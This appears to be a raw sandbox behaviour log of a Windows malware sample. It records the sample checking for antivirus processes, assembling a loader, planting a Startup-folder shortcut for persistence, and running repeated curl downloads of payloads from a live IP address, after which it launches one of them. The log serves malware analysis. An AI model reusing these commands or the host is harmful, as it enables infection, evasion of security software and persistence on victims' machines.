Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nskE4F6.tmp Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
